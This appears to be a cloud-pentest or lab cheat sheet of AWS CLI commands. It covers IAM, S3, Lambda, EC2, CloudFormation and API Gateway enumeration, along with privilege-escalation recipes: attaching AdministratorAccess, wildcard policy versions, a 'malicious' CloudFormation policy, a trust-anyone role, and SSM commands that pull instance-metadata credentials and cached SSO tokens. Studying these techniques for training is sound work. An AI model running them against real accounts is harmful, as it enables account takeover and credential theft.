-
Export the profile's credentials as environment-variable assignments that can be loaded into the current shell:
aws configure export-credentials --profile default --format env
-
List all users in the organization:
aws iam list-users
-
List only the UserName of each user in the organization (PowerShell pipeline):
aws iam list-users | ConvertFrom-Json | select -expand Users | select UserName
-
List groups
aws iam list-groups
-
List groups for a user
aws iam list-groups-for-user --user-name admin
-
List all inline policies for a user
aws iam list-user-policies --user-name admin
-
List attached policy for a user
aws iam list-attached-user-policies --user-name admin
-
Get the credential report for organization users (and root user):
aws iam get-credential-report --output json | jq -r .Content | base64 -d
-
List user certificates
aws iam list-signing-certificates --user-name ad-user
-
Update the status of a user's access key (here setting it to Active):
aws iam update-access-key --access-key-id FICACULOTETTE --status Active
-
List user SSH public keys
aws iam list-ssh-public-keys --user-name ad-user
-
Download a user's SSH public key:
aws iam get-ssh-public-key --user-name ad-user --encoding PEM --ssh-public-key-id <ID>
-
Get the access token for SSO login:
cat ~/.aws/sso/cache/<GUID>.json | jq -r .accessToken
-
Use the access token to get temporary credentials for a role:
aws sso get-role-credentials --role-name SECRO --account-id 00111111111 --access-token eyJlbmMiOiJBMjU2R0NNIiwidGFnIjoic0pI...
-
List the MFA devices assigned to the current user:
aws iam list-mfa-devices
-
List the virtual MFA devices defined in the account:
aws iam list-virtual-mfa-devices
-
List inline policies for a group
aws iam list-group-policies --group-name admin
-
List attached policies for a group
aws iam list-attached-group-policies --group-name admin
-
Get policy information
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
-
Get policy content knowing the policy version:
aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --version-id v1
-
List all policies
aws iam list-policies
-
List role information
aws iam get-role --role-name ad-loggingrole
-
List inline policy for a role
aws iam list-role-policies --role-name ad-loggingrole
-
List attached policies for a role
aws iam list-attached-role-policies --role-name ad-loggingrole
-
Create a new role from command line:
aws iam create-role --role-name lab-enum --assume-role-policy-document file:///tmp/assume-role-doc.json
Where assume-role-doc.json contains:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "sts:AssumeRole", "Condition": {} } ] }
-
Assume a role:
aws sts assume-role --role-arn arn:aws:iam::00111111111:role/LoggingRole --role-session-name assumed
-
Get the information of the current user:
aws sts get-caller-identity
-
List all S3 buckets:
aws s3 ls
-
Attach a managed policy to a user:
aws iam attach-user-policy --user-name student --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
-
Get the login profile (console password settings) for a user:
aws iam get-login-profile --user-name BobAlice
-
Create a new login profile for a user
aws iam create-login-profile --user-name BobAlice --password '!QAZ2wsx' --no-password-reset-required
-
Get the content of a named inline policy of a role:
aws iam get-role-policy --role-name Adder --policy-name AddUser
-
Add a user to a group:
aws iam add-user-to-group --group-name PrintGroup --user-name student
-
Attach a managed policy to a group:
aws iam attach-group-policy --group-name PrintGroup --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
-
Create a new version of an existing policy and set it as the default:
aws iam create-policy-version --policy-arn arn:aws:iam::00111111111:policy/Print --policy-document file://a.json --set-as-default
Where a.json contains:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }
-
List all roles whose trust policy names a specified service principal (here Lambda):
aws iam list-roles | jq -r '.Roles[] | select( .AssumeRolePolicyDocument.Statement[].Principal.Service | contains("lambda"))'
-
Create a new Lambda function:
aws lambda create-function --function-name lambdaf --runtime python3.8 --zip-file fileb://lambdaf.zip --handler lambdaf.handler --role arn:aws:iam::00111111111:role/lab11lambdaiam
-
Execute the lambda function:
aws lambda invoke --function-name lambdaf output.txt
-
Get the latest AMI image for EC2 instance:
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
-
List the subnets for EC2 instances:
aws ec2 describe-subnets
-
List the security groups for VPCs:
aws ec2 describe-security-groups
-
List the instance profiles name:
aws iam list-instance-profiles
-
Create and start an EC2 instance:
aws ec2 run-instances --subnet-id subnet-00111111111 --image-id ami-00111111111 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-00111111111"
-
Execute a command inside an EC2 instance:
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role/"]' --targets "Key=instanceids,Values=i-00111111111" --comment "Retrieving Access Tokens"s
-
Retrieve the output of a command executed inside an EC2 instance:
aws ssm get-command-invocation --command-id 928226f8-2c17-4e66-9200-5bd921899996 --instance-id i-00111111111
-
Create a policy using CloudFormation stack:
aws cloudformation create-stack --stack-name ad-dodo --template-body file://n.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::00111111111:role/lab12CFDeployRole
Where n.json contains:
{ "Resources": { "EvilTemplate": { "Type": "AWS::IAM::Policy", "Properties": { "PolicyName": "admin_policy", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }, "Users": ["student"] } } } }
-
Update a CloudFormation stack to inject a malicious policy:
aws cloudformation update-stack --stack-name privesc --template-body file://privesc.yaml --capabilities CAPABILITY_NAMED_IAM --region eu-west-1
Where privesc.yaml contains:
Resources:
  PrivEscTemplate:
    Type: "AWS::IAM::ManagedPolicy"
    Properties:
      ManagedPolicyName: AdminAccessPolicy
      Description: Admin access to all AWS res
      Path: "/"
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          # allow all
          - Effect: Allow
            Action:
              - "*"
            Resource: "*"
      Roles:
        - RuoloCheFaCose
-
Get information on the CloudFormation stack status:
aws cloudformation describe-stacks --stack-name ad-dodo
-
List events of the CloudFormation stack:
aws cloudformation describe-stack-events --stack-name ad-dodo
-
List the API Gateway account (with quota):
aws apigateway get-account
-
List all configured REST APIs:
aws apigateway get-rest-apis
-
Enumerate the resources of a REST API:
aws apigateway get-resources --rest-api-id jojioijijoi
-
List the configuration for a single API call:
aws apigateway get-method --rest-api-id jojioijijoi --http-method GET --resource-id iouh789hi
-
List the authorizers used by an API:
aws apigateway get-authorizers --rest-api-id hiuh789hk
-
List the API keys:
aws apigateway get-api-keys
-
List GuardDuty detectors:
aws guardduty list-detectors
-
List GuardDuty filters:
aws guardduty list-filters --detector-id 1dd0e5bfc954bc46fe800952be7e2a69
-
Get the GuardDuty filter configuration:
aws guardduty get-filter --detector-id 1dd0e5bfc954bc46fe800952be7e2a69 --filter-name test-whitelist
-
List Lambda functions:
aws lambda list-functions
-
Get details of a Lambda function:
aws lambda get-function --function-name dictionary-attack
-
List Lambda function available layers:
aws lambda list-layers
-
Enumerate a specific Lambda layer:
aws lambda list-layer-versions --layer-name boto3-jinja
-
Enumerate a specific Lambda layer version:
aws lambda get-layer-version --layer-name boto3-jinja --version-number 1
-
List all the event sources for a Lambda function:
aws lambda list-event-source-mappings --function-name dictionary-attack
-
Dump the table of DynamoDB database:
aws dynamodb scan --table-name TABLE_NAME
-
Dump the content of a secret stored in Secrets Manager:
aws secretsmanager get-secret-value --secret-id MySecret
-
Anonymously enumerate S3 bucket:
aws s3 --no-sign-request --region ap-southeast-1 ls s3://bucket-name
-
Download a file from S3 bucket anonymously:
aws s3 --no-sign-request --region ap-southeast-1 cp s3://bucket-name/scripts/backup.sh /tmp/backup.sh
-
List objects inside a bucket:
aws s3api list-objects --bucket NomeBucket
-
Get bucket policy:
aws s3api get-bucket-policy --bucket NomeBucket | jq -r .Policy | jq
-
Get the bucket location:
aws s3api get-bucket-location --bucket data-extractor-repo
-
List object versions:
aws s3api list-object-versions --bucket data-extractor-repo
-
Get the ACL of an object inside a bucket
aws s3api get-object-acl --bucket NomeBucket --key flag
-
Check the policy status of a bucket (whether its policy makes the bucket public):
aws s3api get-bucket-policy-status --bucket bucket-code
-
Get the Block Public Access configuration of a bucket:
aws s3api get-public-access-block --bucket bucket-code
-
Get information about an EKS cluster:
aws eks describe-cluster --name clusterName
Last active
September 8, 2023 20:31